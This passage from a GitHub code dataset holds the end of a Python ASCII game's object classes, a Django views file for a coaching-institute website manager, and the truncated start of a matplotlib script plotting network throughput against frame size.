self._vely += GRAVITY\r\n self._y = self._y + self._vely\r\n self.check_collisions()\r\n self._scene.message_board(str(self._vely))\r\n self._scene.add_to_scene(self)\r\n else:\r\n self._vely = 0\r\n\r\n if self.get_y() == PLAYER_INIT[1]:\r\n self._vely = 0\r\n\r\n def fire(self):\r\n pew = PewPew(self._scene, self.get_x() + self.get_width(), self.get_y() - self.get_height() + 1)\r\n self._scene.add_to_scene(pew, 'pewpews')\r\n \r\n def activate_shield(self):\r\n self._scene.remove_from_scene(self)\r\n super().__init__(MANDO_SHIELD, self._scene, self.get_x(), self.get_y(), self._fore, self._back)\r\n self._scene.add_to_scene(self)\r\n self._velx = 0\r\n self._shield_active = True\r\n self._shield_start = time.time()\r\n \r\n def deactivate_shield(self):\r\n self._scene.remove_from_scene(self)\r\n super().__init__(MANDO_SPRITE, self._scene, self.get_x(), self.get_y(), self._fore, self._back)\r\n self._scene.add_to_scene(self)\r\n self._velx = 0\r\n self._shield_active = False\r\n self._shield_start = None\r\n \r\n def shield_active(self):\r\n return self._shield_active\r\n\r\n def check_score(self):\r\n return self._score\r\n \r\n def check_lives(self):\r\n return self._lives\r\n \r\n\r\n\r\nclass Coin(GameObject):\r\n def __init__(self, scene, x, y, fore = 'WHITE', back = 'BLACK'):\r\n super().__init__(COIN, scene, x, y, fore, back)\r\n\r\nclass Beam(GameObject):\r\n def __init__(self, btype, scene, x, y, fore = 'WHITE', back = 'BLACK'):\r\n super().__init__(btype, scene, x, y, fore, back)\r\n\r\nclass Magnet(GameObject):\r\n def __init__(self, scene, x, y, fore = 'WHITE', back = 'BLACK'):\r\n super().__init__(MAGNET, scene, x, y, fore, back)\r\n\r\nclass SpeedUp(GameObject):\r\n def __init__(self, scene, x, y, fore = 'WHITE', back = 'BLACK'):\r\n super().__init__(SPEEDUP, scene, x, y, fore, back)","repo_name":"shivanshseth/the-mandalorian-ascii-game","sub_path":"game_objects.py","file_name":"game_objects.py","file_ext":"py","file_size_in_byte":8917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11019693195","text":"import datetime\n\nfrom django.shortcuts import render, redirect\nfrom accounts.forms import RegistrationForm, EditProfileForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserChangeForm, PasswordChangeForm\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom edu.models import CoachingProfile\nfrom accounts.account_forms.coaching_registeration import CoachingRegisterationForm\nfrom accounts.account_forms.contactus import CoachingContactForm\nfrom pages.models import *\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom accounts.models import UserProfile\nfrom django.contrib.auth.decorators import login_required\n\ndef redirect_to_login():\n\treturn redirect(reverse('accounts:login'))\n\n# Create your views here.\ndef home(request):\n\tif request.user.is_authenticated:\n\t\t# Get All data name\n\t\tuser_exits = CoachingProfile.objects.filter(username=request.user)\n\t\tif not user_exits:\n\t\t\tform = CoachingRegisterationForm()\n\t\t\treturn render(request, 'accounts/register_coaching.html', {'form': form, 'coaching_profile':1})\n\t\treturn redirect(reverse('accounts:coachingprofile'))\n\telse:\n\t\treturn render(request, 'accounts/home.html')\n\n# Create your views here.\ndef register(request):\n\tif request.method == 'POST':\n\t\tform = RegistrationForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect(reverse('accounts:login'))\n\t\telse:\n\t\t\targs = {'form': form}\n\t\t\treturn render(request, 'accounts/reg_form.html', args)\n\telse:\n\t\tform = RegistrationForm()\n\n\t\targs = {'form': form}\n\t\treturn render(request, 'accounts/reg_form.html', args)\n\n@login_required(login_url='/account/login/')\ndef profile(request):\n\tprofile = CoachingProfile.objects.get(username=request.user)\n\n\tif request.method == 'POST':\n\t\tup = UserProfile.objects.get(user=request.user)\n\t\tup.description = request.POST.get('description')\n\t\tup.city = request.POST.get('city')\n\t\tup.phone = request.POST.get('contact')\n\t\tif request.FILES:\n\t\t\tup.image = request.FILES['profilepic']\n\t\tup.save()\n\n\treturn render(request, 'accounts/user.html',{'coaching_name': profile.name})\n\n@login_required(login_url='/account/login/')\ndef change_password(request):\n\tprofile = CoachingProfile.objects.get(username=request.user)\n\tif request.method == 'POST':\n\t\tform = PasswordChangeForm(data=request.POST, user=request.user)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tupdate_session_auth_hash(request, form.user)\n\t\t\targs = {'form': PasswordChangeForm(user=request.user), 'coaching_name': profile.name, 'result':{'status':'success', 'message': \"Password updated successfully.\"}}\n\t\t\treturn render(request, 'accounts/change_password.html', args)\n\t\telse:\n\t\t\targs = {'form': form}\n\t\t\treturn render(request, 'accounts/change_password.html', args)\n\telse:\n\t\tform = PasswordChangeForm(user=request.user)\n\t\targs = {'form': form, 'coaching_name': profile.name}\n\t\treturn render(request, 'accounts/change_password.html', args)\n\n@login_required(login_url='/account/login/')\ndef registerNewCoaching(request):\n\n\tform = CoachingRegisterationForm(request.POST)\n\tif form.is_valid():\n\t\tc_profile = CoachingProfile.objects.filter(username=request.user).values()\n\t\tif c_profile:\n\t\t\tif c_profile[0].get('url') != form.cleaned_data['unique_url']:\n\t\t\t\tresult = CoachingProfile.objects.filter(url=form.cleaned_data['unique_url']).values()\n\t\t\t\tif result:\n\t\t\t\t\treturn render(request, 'accounts/coaching_profile.html', {'form': form, 'result':{'status':'warn', 'message': \"Entered url is not available, Please enter new url.\"}})\n\n\t\t\tCoachingProfile.objects.filter(username=request.user).update(name=form.cleaned_data['coaching_name'], url=form.cleaned_data['unique_url'])\n\t\telse:\n\t\t\tresult = CoachingProfile.objects.filter(url=form.cleaned_data['unique_url']).values()\n\t\t\tif result:\n\t\t\t\treturn render(request, 'accounts/register_coaching.html', {'form': form, 'result':{'status':'warn', 'message': \"Entered url is not available, Please enter new url.\"}})\n\n\t\t\tnewc = CoachingProfile(username=request.user, name=form.cleaned_data['coaching_name'], url=form.cleaned_data['unique_url'])\n\t\t\tnewc.save()\n\t\treturn getCoachingProfile(request)\n\telse:\n\t\treturn render(request, 'accounts/register_coaching.html', {'form': form})\n\n@login_required(login_url='/account/login/')\ndef getCoachingProfile(request):\n\ttry:\n\t\tprofile = CoachingProfile.objects.get(username=request.user)\n\texcept ObjectDoesNotExist as e:\n\t\tprint(str(request.user) + \" Error: Coaching registration not complated yet\")\n\t\treturn redirect(reverse('accounts:home'))\n\n\tform = CoachingRegisterationForm(initial={'coaching_name':profile.name,'unique_url':profile.url})\n\treturn render(request, 'accounts/coaching_profile.html', {'form': form, 'coaching_name': profile.name, 'page_name':\"Coaching Profile\"})\n\t\n@login_required(login_url='/account/login/')\ndef edit_contactus(request):\n\tcontactUsInfo = CoachingContact.objects.filter(username=request.user).values()\n\ttry:\n\t\tprofile = CoachingProfile.objects.get(username=request.user)\n\texcept ObjectDoesNotExist as e:\n\t\tprint(str(request.user) + \" Error: Coaching registration not complated yet\")\n\t\treturn redirect(reverse('accounts:home'))\n\n\tif request.method == \"GET\":\n\t\tform = CoachingContactForm()\n\t\tif contactUsInfo and contactUsInfo[0]:\n\t\t\tcontactUsInfo = contactUsInfo[0]\n\t\t\tform.fields['email'].initial = contactUsInfo.get('email')\n\t\t\tform.fields['address'].initial = contactUsInfo.get('address')\n\t\t\tform.fields['mobile'].initial = contactUsInfo.get('phone')\n\t\t\tform.fields['message'].initial = contactUsInfo.get('message')\n\t\t\tform.fields['header'].initial = contactUsInfo.get('header')\n\t\t\tform.fields['city'].initial = contactUsInfo.get('city')\n\t\treturn render(request, 'accounts/edit_contactus.html', {'form': form, 'page_name':\"Edit Contact Us\", 'coaching_name': profile.name})\n\telif request.method == \"POST\":\n\t\tform = CoachingContactForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tif contactUsInfo and contactUsInfo[0]:\n\t\t\t\tcontactUsInfo = contactUsInfo[0]\n\t\t\t\tCoachingContact.objects.filter(username=request.user).update(\n\t\t\t\t\temail=form.cleaned_data['email'],\n\t\t\t\t\tphone=form.cleaned_data['mobile'],\n\t\t\t\t\tmessage=form.cleaned_data['message'],\n\t\t\t\t\theader=form.cleaned_data['header'],\n\t\t\t\t\taddress=form.cleaned_data['address'],\n\t\t\t\t\tcity=form.cleaned_data['city']\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tcontactusinfo = CoachingContact(username=request.user,\n\t\t\t\t\temail=form.cleaned_data['email'],\n\t\t\t\t\tphone=form.cleaned_data['mobile'],\n\t\t\t\t\tmessage=form.cleaned_data['message'],\n\t\t\t\t\theader=form.cleaned_data['header'],\n\t\t\t\t\taddress=form.cleaned_data['address'],\n\t\t\t\t\tcity=form.cleaned_data['city'])\n\n\t\t\t\tcontactusinfo.save()\n\n\t\t\treturn render(request, 'accounts/success_page.html', {'coaching_name': profile.name})\n\t\telse:\n\t\t\treturn render(request, 'accounts/edit_contactus.html', {'form': form, 'page_name':\"Edit Contact Us\", 'coaching_name': profile.name})\n\n@login_required(login_url='/account/login/')\ndef edit_courses(request):\n\ttry:\n\t\tprofile = CoachingProfile.objects.get(username=request.user)\n\texcept ObjectDoesNotExist as e:\n\t\tprint(str(request.user) + \" Error: Coaching registration not complated yet\")\n\t\treturn redirect(reverse('accounts:home'))\n\n\tdatatoedit = []\n\tgettitle = None\n\tif request.method == \"POST\":\n\t\ttitle = request.POST.get(\"title\")\n\t\taction = request.POST.get(\"action\")\n\t\tif action == \"delete\":\n\t\t\tCoachingCourse.objects.filter(username=request.user).filter(title=title).delete()\n\t\treturn HttpResponseRedirect(reverse(\"accounts:ecourses\"))\n\n\tif request.method == \"GET\":\n\t\tgettitle = request.GET.get(\"title\")\n\t\taction = request.GET.get(\"action\")\n\t\teditdata = list(CoachingCourse.objects.filter(username=request.user).filter(title=gettitle).values())\n\t\tfor data in editdata:\n\t\t\tdatatoedit.append(data.get('chapter'))\n\n\tcourse_titles = CoachingCourse.objects.filter(username=request.user).values('title').distinct()\n\tresponse = []\n\tfor titleDict in course_titles:\n\t\tresponse.append(titleDict.get('title'))\n\n\treturn render(request, 'accounts/edit_courses.html',{'data':response, 'chapters': datatoedit, 'title': gettitle, 'page_name':\"Edit Courses\", 'coaching_name': profile.name})\n\n@login_required(login_url='/account/login/')\ndef save_new_course(request):\n\ttry:\n\t\tprofile = CoachingProfile.objects.get(username=request.user)\n\texcept ObjectDoesNotExist as e:\n\t\tprint(str(request.user) + \" Error: Coaching registration not complated yet\")\n\t\treturn redirect(reverse('accounts:home'))\n\n\tif request.method == \"POST\":\n\t\tcourse_title = request.POST.get('course_title')\n\t\tchapters = request.POST.getlist('chapter')\n\n\t\t# Check if same course exists, if exists delete it and save from new\n\t\tCoachingCourse.objects.filter(username=request.user).filter(title=course_title).delete()\n\n\t\t#Get supported courses by this user\n\t\tcourse_count = len(CoachingCourse.objects.filter(username=request.user).values('courseid').distinct()) + 1\n\n\t\tcount = 1\n\t\tfor chapter in chapters:\n\t\t\tcourseinfo = CoachingCourse(username=request.user, title=course_title, chapterid=\"chapter-\" + str(count), chapter=chapter, courseid=course_count)\n\t\t\tcourseinfo.save()\n\t\t\tcount = count + 1\n\n\t\treturn HttpResponseRedirect(reverse(\"accounts:savenewcourse\"))\n\n\tcourse_titles = CoachingCourse.objects.filter(username=request.user).values('title').distinct()\n\tresponse = []\n\tfor titleDict in course_titles:\n\t\tresponse.append(titleDict.get('title'))\n\n\treturn render(request, 'accounts/edit_courses.html',{'data':response, 'page_name':\"Edit Courses\", 'coaching_name': profile.name})\n\n@login_required(login_url='/account/login/')\ndef edit_price(request):\n\ttry:\n\t\tprofile = CoachingProfile.objects.get(username=request.user)\n\texcept ObjectDoesNotExist as e:\n\t\tprint(str(request.user) + \" Error: Coaching registration not complated yet\")\n\t\treturn redirect(reverse('accounts:home'))\n\n\tpriceInfo = {}\n\tif request.method == 'POST':\n\t\tfor key in request.POST.keys():\n\t\t\tif key == 'csrfmiddlewaretoken': continue\n\t\t\tprice_info = CoursePrice.objects.filter(username=request.user).filter(title=key).values()\n\t\t\tif price_info:\n\t\t\t\tCoursePrice.objects.filter(username=request.user).filter(title=key).update(price=request.POST.get(key))\n\t\t\telse:\n\t\t\t\tCoursePrice(username=request.user, title=key, price=request.POST.get(key)).save()\n\t\t\t\n\t\t\tpriceInfo[key] = request.POST.get(key)\n\n\t\treturn HttpResponseRedirect(reverse(\"accounts:eprice\"))\n\n\tcourse_titles = CoachingCourse.objects.filter(username=request.user).values('title').distinct()\n\tprice_info = CoursePrice.objects.filter(username=request.user).values()\n\tfor data in course_titles:\n\t\tprice_info = CoursePrice.objects.filter(username=request.user).filter(title=data.get('title')).values('price')\n\t\tif price_info:\n\t\t\tpriceInfo[data.get('title')] = price_info[0].get('price')\n\t\telse:\n\t\t\tpriceInfo[data.get('title')] = 0\n\n\treturn render(request, 'accounts/edit_price.html', {'result': priceInfo, 'page_name':\"Edit Price\", 'coaching_name': profile.name})\n\n@csrf_exempt\ndef enquiry(request):\n\tif request.method == \"POST\":\n\t\ttry:\n\t\t\t# Get Coaching Profile Id\n\t\t\tc_url = request.POST.get('domurl')\n\t\t\turl = c_url.split(\"/\")[3]\n\t\t\t# Get Profile Info\n\t\t\tc_profile = CoachingProfile.objects.filter(url=url)\n\t\t\t# Get User name for which this coaching belongs To\n\t\t\tusername = c_profile[0].username\n\t\t\tname = request.POST.get('name', '')\n\t\t\temail = request.POST.get('email', '')\n\t\t\tmobile = request.POST.get('mobile')\n\t\t\tmessage = request.POST.get('message', '')\n\t\t\tsubject = request.POST.get('subject', '')\n\t\t\tStudentEnquiry(username=username, name=name, email=email, mobile=mobile, message=message, subject=subject).save()\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\t\treturn JsonResponse(status=500)\n\t\treturn JsonResponse({})\n\telif request.method == \"GET\":\n\t\tif not request.user.is_authenticated:\n\t\t\treturn redirect_to_login()\n\t\ttry:\n\t\t\tprofile = CoachingProfile.objects.get(username=request.user)\n\t\texcept ObjectDoesNotExist as e:\n\t\t\tprint(str(request.user) + \" Error: Coaching registration not complated yet\")\n\t\t\treturn redirect(reverse('accounts:home'))\n\n\t\tdata = list(StudentEnquiry.objects.filter(username=request.user).order_by('-created_at').values())\n\t\treturn render(request, 'accounts/enquiry.html', {'data':data, 'page_name':\"Enquiry\", 'coaching_name': profile.name})\n\t\t\t\n@login_required(login_url='/account/login/')\ndef edit_about(request):\n\ttry:\n\t\tprofile = CoachingProfile.objects.get(username=request.user)\n\texcept ObjectDoesNotExist as e:\n\t\tprint(str(request.user) + \" Error: Coaching registration not complated yet\")\n\t\treturn redirect(reverse('accounts:home'))\n\n\tresponseObj = {}\n\tif request.method == \"POST\":\n\t\taction = request.POST.get(\"action\")\n\t\tif action == \"aboutus\":\n\t\t\tmessage = request.POST.get(\"message\")\n\t\t\taboutteam = request.POST.get(\"aboutteam\")\n\t\t\tdata = list(CoachingAboutus.objects.filter(username=request.user).values())\n\t\t\tif not data:\n\t\t\t\tCoachingAboutus(username=request.user, aboutus=message, aboutteam=aboutteam).save()\n\t\t\telse:\n\t\t\t\tCoachingAboutus.objects.filter(username=request.user).update(aboutus=message, aboutteam=aboutteam)\n\t\tif action == \"achievements\":\n\t\t\tmessage = request.POST.get(\"message\")\n\t\t\ttitle = request.POST.get(\"title\")\n\t\t\ttask = request.POST.get(\"task\")\n\t\t\tid = request.POST.get(\"id\")\n\t\t\tif task and task == \"delete\":\n\t\t\t\tCoachingAchievements.objects.filter(username=request.user).filter(id=id).delete()\n\t\t\telse:\n\t\t\t\tdata = list(CoachingAchievements.objects.filter(username=request.user).filter(id=id).values())\n\t\t\t\tif not data:\n\t\t\t\t\tCoachingAchievements(username=request.user, title=title, achievements=message).save()\n\t\t\t\telse:\n\t\t\t\t\tCoachingAchievements.objects.filter(username=request.user).filter(id=id).update(achievements=message,title=title)\n\n\t\tif action == \"news\":\n\t\t\tmessage = request.POST.get(\"message\")\n\t\t\ttitle = request.POST.get(\"title\")\n\t\t\ttask = request.POST.get(\"task\")\n\t\t\tid = request.POST.get(\"id\")\n\t\t\tif task and task == \"delete\":\n\t\t\t\tCoachingNews.objects.filter(username=request.user).filter(id=id).delete()\n\t\t\telse:\n\t\t\t\tdata = list(CoachingNews.objects.filter(username=request.user).filter(id=id).values())\n\t\t\t\tif not data:\n\t\t\t\t\tCoachingNews(username=request.user, title=title, message=message).save()\n\t\t\t\telse:\n\t\t\t\t\tCoachingNews.objects.filter(username=request.user).filter(id=id).update(title=title, message=message)\n\n\t\tif action == \"team\":\n\t\t\tname = request.POST.get(\"name\")\n\t\t\tdesignation = request.POST.get(\"designation\")\n\t\t\tdescription = request.POST.get(\"description\")\n\t\t\ttask = request.POST.get(\"task\")\n\t\t\tid=request.POST.get(\"id\")\n\t\t\tif task and task == \"delete\":\n\t\t\t\tCoachingTeam.objects.filter(username=request.user).filter(id=id).delete()\n\t\t\telse:\n\t\t\t\tdata = list(CoachingTeam.objects.filter(username=request.user).filter(id=id).values())\n\t\t\t\tif not data:\n\t\t\t\t\tCoachingTeam(username=request.user, name=name, designation=designation, description=description).save()\n\t\t\t\telse:\n\t\t\t\t\tCoachingTeam.objects.filter(username=request.user).filter(id=id).update(name=name, designation=designation, description=description)\n\n\t\treturn HttpResponseRedirect(reverse(\"accounts:eabout\"))\n\n\tif request.method == \"GET\":\n\t\taction = request.GET.get(\"action\")\n\t\tid = request.GET.get(\"id\")\n\t\tif action == \"achievements\":\n\t\t\teditachievement = list(CoachingAchievements.objects.filter(username=request.user).filter(id=id).values())\n\t\t\tif editachievement:\n\t\t\t\tresponseObj.update({\"editachievement\": editachievement[0]})\n\t\telif action == \"news\":\n\t\t\tnews = list(CoachingNews.objects.filter(username=request.user).filter(id=id).values())\n\t\t\tif news:\n\t\t\t\tresponseObj.update({\"editnews\": news[0]})\n\t\telif action == \"team\":\n\t\t\tteam = list(CoachingTeam.objects.filter(username=request.user).filter(id=id).values())\n\t\t\tif team:\n\t\t\t\tresponseObj.update({\"editmem\": team[0]})\n\n\t# Prepare response objetc\n\taboutusmsg = list(CoachingAboutus.objects.filter(username=request.user).values())\n\tif aboutusmsg:\n\t\tresponseObj.update({'about':aboutusmsg[0]})\n\t\t\n\tachievements = list(CoachingAchievements.objects.filter(username=request.user).values())\n\n\tif achievements:\n\t\tresponseObj.update({'achievements': achievements})\n\n\tnews = list(CoachingNews.objects.filter(username=request.user).values())\n\tif news:\n\t\tresponseObj.update({'news': news})\n\n\tteam = list(CoachingTeam.objects.filter(username=request.user).values())\n\tif team:\n\t\tresponseObj.update({'team': team})\n\treturn render(request, 'accounts/edit_about.html', {'data':responseObj, 'page_name':\"Edit About Us\", 'coaching_name': profile.name})\n\n@login_required(login_url='/account/login/')\ndef edit_home(request):\n\ttry:\n\t\tprofile = CoachingProfile.objects.get(username=request.user)\n\texcept ObjectDoesNotExist as e:\n\t\tprint(str(request.user) + \" Error: Coaching registration not complated yet\")\n\t\treturn redirect(reverse('accounts:home'))\n\n\tresponseObj = {}\n\tif request.method == \"POST\":\n\t\taction = request.POST.get(\"action\")\n\t\tif action == \"homegeneral\":\n\t\t\timagetxt1 = request.POST.get(\"imageovertxt1\")\n\t\t\timagetxt2 = request.POST.get(\"imageovertxt2\")\n\t\t\tcourses = request.POST.get(\"coursesinfo\")\n\t\t\tour_staff = request.POST.get(\"staffinfo\")\n\t\t\tlatest_updates = request.POST.get(\"news\")\n\t\t\tplacements = request.POST.get(\"placementinfo\")\n\t\t\thome_id = request.POST.get(\"id\")\n\n\t\t\thdata = list(CoachingHome.objects.filter(username=request.user).filter(id=home_id).values())\n\t\t\tif not hdata:\n\t\t\t\tCoachingHome(username=request.user,\n\t\t\t\timage_txt_1=imagetxt1,\n\t\t\t\timage_txt_2=imagetxt2,\n\t\t\t\tcourses=courses,\n\t\t\t\tour_staff=our_staff,\n\t\t\t\tlatest_updates=latest_updates,\n\t\t\t\tplacements=placements).save()\n\t\t\telse:\n\t\t\t\tCoachingHome.objects.filter(username=request.user).update(\n\t\t\t\timage_txt_1=imagetxt1,\n\t\t\t\timage_txt_2=imagetxt2,\n\t\t\t\tcourses=courses,\n\t\t\t\tour_staff=our_staff,\n\t\t\t\tlatest_updates=latest_updates,\n\t\t\t\tplacements=placements)\n\n\t\telif action == \"homecourse\":\n\t\t\tcourse_title = request.POST.get(\"ctitle\")\n\t\t\tcourse_msg = request.POST.get(\"cmsg\")\n\t\t\tcourse_id = request.POST.get(\"id\")\n\t\t\ttask = request.POST.get(\"task\")\n\t\t\tif task and task == \"delete\":\n\t\t\t\tNewCourses.objects.filter(username=request.user).filter(id=course_id).delete()\n\t\t\telse:\n\n\t\t\t\tcdata = list(NewCourses.objects.filter(username=request.user).filter(id=course_id).values())\n\t\t\t\tif not cdata:\n\t\t\t\t\tNewCourses(username=request.user,\n\t\t\t\t\ttitle=course_title,\n\t\t\t\t\tmessage=course_msg).save()\n\t\t\t\telse:\n\t\t\t\t\tNewCourses.objects.filter(username=request.user).filter(id=course_id).update(\n\t\t\t\t\ttitle=course_title,\n\t\t\t\t\tmessage=course_msg)\n\t\treturn HttpResponseRedirect(reverse(\"accounts:ehome\"))\n\n\tif request.method == \"GET\":\n\t\taction = request.GET.get(\"action\")\n\t\tif action and action == \"homecourse\":\n\t\t\tcourse_id = request.GET.get(\"id\")\n\t\t\teditcourse = list(NewCourses.objects.filter(username=request.user).filter(id=course_id).values())\n\t\t\tif editcourse:\n\t\t\t\tresponseObj.update({'editcourse': editcourse[0]})\n\t\t\n\n\thome = list(CoachingHome.objects.filter(username=request.user).values())\n\tif home:\n\t\tresponseObj.update({'home': home[0]})\n\t\n\tcourses = list(NewCourses.objects.filter(username=request.user).values())\n\tif home:\n\t\tresponseObj.update({'courses': courses})\n\treturn render(request, 'accounts/edit_home.html', {'data':responseObj, 'page_name':\"Edit Home\", 'coaching_name': profile.name})","repo_name":"yogeshprasad/spa-development","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3028227838","text":"\"\"\"\r\nMTU\t\tOctet\t\tSingle\t\tLine Rate\r\n64\t\t135684.08 \t19318.17\t154545.38 \r\n68\t\t143665.52 \t19565.14\t156521.14 \r\n72\t\t151646.88 \t19791.59\t158332.72 \r\n76\t\t159628.32 \t19999.92\t159999.38 \r\n80\t\t161537.76 \t20192.23\t161537.84 \r\n84\t\t162962.24 \t20370.29\t162962.34 \r\n88\t\t164284.96 \t20535.64\t164285.09 \r\n96\t\t166666.00 \t20833.25\t166666.03 \r\n112\t\t170587.52 \t21323.45\t170587.59 \r\n128\t\t173683.52 \t21710.45\t173683.56 \r\n160\t\t178260.16 \t22282.53\t178260.20 \r\n192\t\t181480.72 \t22685.10\t181480.81 \r\n256\t\t185713.54 \t23214.20\t185713.60 \r\n384\t\t190195.33 \t23774.42\t190195.38 \r\n512\t\t192536.80 \t24067.08\t192536.61 \r\n1024\t196182.64 \t24522.81\t196182.49 \r\n1400\t197190.48 \t24648.79\t197190.29 \r\n9000\t199556.08 \t24944.50\t199556.01 \r\n\"\"\"\r\n\r\nfrom mpl_toolkits.mplot3d import axes3d\t# used for scatter\r\nfrom matplotlib import style\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\"\"\"\r\nfilename: plot.py\r\n[]: https://matplotlib.org/1.5.3/users/style_sheets.html\t\"\"\r\n\"\"\"\r\n\r\n\r\ndef f_plot_1():\r\n\tpktlen = [64, 68, 72, 76, 80, 84, 88, 96, 112,\r\n 128, 160, 192, 256, 384, 512, 1024, 1400, 9000]\r\n\toctet = [135684.08, 143665.52, 151646.88, 159628.32, 161537.76, 162962.24, 164284.96, 166666.00, 170587.52,\r\n 173683.52, 178260.16, 181480.72, 185713.54, 190195.33, 192536.80, 196182.64, 197190.48, 199556.08]\r\n\tsingle = [19318.17, 19565.14, 19791.59, 19999.92, 20192.23, 20370.29, 20535.64, 20833.25, 21323.45,\r\n 21710.45, 22282.53, 22685.10, 23214.20, 23774.42, 24067.08, 24522.81, 24648.79, 24944.50]\r\n\ttx_rate = [19047.619, 19318.182, 19565.217, 19791.667, 20000.000, 20192.308, 20370.371, 20689.655, 21212.121,\r\n 21621.622, 22222.222, 22641.509, 23188.406, 23762.376, 24060.151, 24521.072, 24647.887, 24944.568]\r\n\tline_rate = 25.78125 # for F1000\r\n\t# line_rate = 25\t\t\t# for IXIA\r\n\r\n\ty_1 = [i/1e3 for i in octet]\r\n\ty_2 = [i*8/1e3 for i in single]\r\n\ty_3 = [i*8/1e3 for i in tx_rate]\t\t\t\t\t# Tx Rate = TX Rate UB\r\n\ty_4 = [r*8/1e3*(pktlen[i]+4.0)/pktlen[i]\r\n for i, r in enumerate(tx_rate)] # Expected RX rate = RX Rate UB\r\n\ty_5 = [(i)/(i+20)*(line_rate*8) for i in pktlen]\t\t# TX Rate UB\r\n\ty_6 = [(i+4)/(i+20)*(line_rate*8) for i in pktlen]\t\t\t\t# RX Rate UB, ERROR!\r\n\ty_7 = [ub if ub < y_4[i] else y_4[i] for i, ub in enumerate(y_5)]\r\n\r\n\tfig = plt.figure(figsize=[9.6, 4.8]) # purple\r\n\tplt.plot(pktlen, y_1, color='black', marker='.', label=\"octet\")\r\n\tplt.plot(pktlen, y_2, color='blue', marker='.', label=\"single×8\")\r\n\tplt.plot(pktlen, y_3, color='orange', marker='.', label=\"tx rate\")\r\n\tplt.plot(pktlen, y_4, color='pink', marker='.', label=\"expected RX rate\")\r\n\tplt.plot(pktlen, y_5, color='yellow', marker='.', label=\"RX rate UB\")\r\n\tplt.plot(pktlen, y_7, color='red', marker='.', label=\"upper bound\")\r\n\r\n\tplt.grid()\r\n\tplt.legend()\r\n\t# plt.xscale('log2')\r\n\tplt.semilogx(base=2)\r\n\tplt.xlim(64, 1500)\r\n\tplt.ylim(130, 210)\r\n\tplt.xlabel('Frame size (B)')\r\n\tplt.ylabel('Thoughput (Gbps)')\r\n\tplt.title('Thoughput - Frame size')\r\n\r\n\t# function to show the plot\r\n\treturn\r\n\r\n\r\ndef plot_bar():\r\n\tleft = [1, 2, 3, 4, 5]\r\n\theight = [10, 24, 36, 40, 5]\r\n\ttick_label = ['one', 'two', 'three', 'four', 'five']\r\n\tplt.bar(left, height, tick_label=tick_label,\r\n\t\t\twidth=0.8, color=['red', 'green'])\t# color set one by one\r\n\r\ndef plot_histogram():\r\n\tages = [2, 5, 70, 40, 30, 45, 50, 45, 43, 40, 44,\r\n\t\t 60, 7, 13, 57, 18, 90, 77, 32, 21, 20, 40]\r\n\t# setting the ranges and no. of intervals\r\n\trange = (0, 100)\r\n\tbins = 10\r\n\tplt.hist(ages, bins, range, color='green',\r\n\t\t\thisttype='bar', rwidth=0.8)\r\n\r\ndef plot_scatter():\r\n\tx = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\n\ty = [2, 4, 5, 7, 6, 8, 9, 11, 12, 12]\r\n\tplt.scatter(x, y, marker=\"*\", s=30)\t# size: s.\r\n\r\ndef plot_pie():\r\n\t\"\"\"\r\n\texplode is used to set the fraction of radius with which we offset each wedge.\r\n\tautopct is used to format the value of each label. Here, we have set it to show the percentage value only upto 1 decimal place\r\n\t\"\"\"\r\n\tactivities = ['eat', 'sleep', 'work', 'play']\r\n\t# portion covered by each label\r\n\tslices = [3, 7, 8, 6]\r\n\tcolors = ['r', 'y', 'g', 'b']\r\n\tplt.pie(slices, labels = activities, colors=colors, \r\n\t\t\tstartangle=90, shadow = True, explode = (0, 0, 0.1, 0),\r\n\t\t\tradius = 1.2, autopct = '%1.1f%%')\r\n\r\n# function to generate coordinates\r\n\r\n\r\ndef create_plot(ptype):\r\n\t# setting the x-axis values\r\n\tx = np.arange(-10, 10, 0.01)\r\n\r\n\t# setting the y-axis values\r\n\tif ptype == 'linear':\r\n\t\ty = x\r\n\telif ptype == 'quadratic':\r\n\t\ty = x**2\r\n\telif ptype == 'cubic':\r\n\t\ty = x**3\r\n\telif ptype == 'quartic':\r\n\t\ty = x**4\r\n\r\n\treturn(x, y)\r\n\r\n\r\ndef plot_subplot():\r\n\t# setting a style to use\r\n\tplt.style.use('fivethirtyeight')\r\n\r\n\t# create a figure\r\n\tfig = plt.figure(fontsize=20, figsize=[9.6, 4.8])\r\n\tplt.grid()\r\n\r\n\t# define subplots and their positions in figure\r\n\tplt1 = fig.add_subplot(221)\r\n\tplt2 = fig.add_subplot(222)\r\n\tplt3 = fig.add_subplot(223)\r\n\tplt4 = fig.add_subplot(224)\r\n\r\n\t# plotting points on each subplot\r\n\tx, y = create_plot('linear')\r\n\tplt1.plot(x, y, color='r')\r\n\tplt1.set_title('$y_1 = x$')\r\n\r\n\tx, y = create_plot('quadratic')\r\n\tplt2.plot(x, y, color='b')\r\n\tplt2.set_title('$y_2 = x^2$')\r\n\r\n\tx, y = create_plot('cubic')\r\n\tplt3.plot(x, y, color='g')\r\n\tplt3.set_title('$y_3 = x^3$')\r\n\r\n\tx, y = create_plot('quartic')\r\n\tplt4.plot(x, y, color='k')\r\n\tplt4.set_title('$y_4 = x^4$')\r\n\r\n\t# adjusting space between subplots\r\n\tfig.subplots_adjust(hspace=.5, wspace=0.5)\r\n\r\n\r\n# function to generate coordinates\r\ndef create_plot(ptype):\r\n # setting the x-axis values\r\n x = np.arange(0, 5, 0.01)\r\n\r\n # setting y-axis values\r\n if ptype == 'sin':\r\n # a sine wave\r\n y = np.sin(2*np.pi*x)\r\n elif ptype == 'exp':\r\n # negative exponential function\r\n y = np.exp(-x)\r\n elif ptype == 'hybrid':\r\n 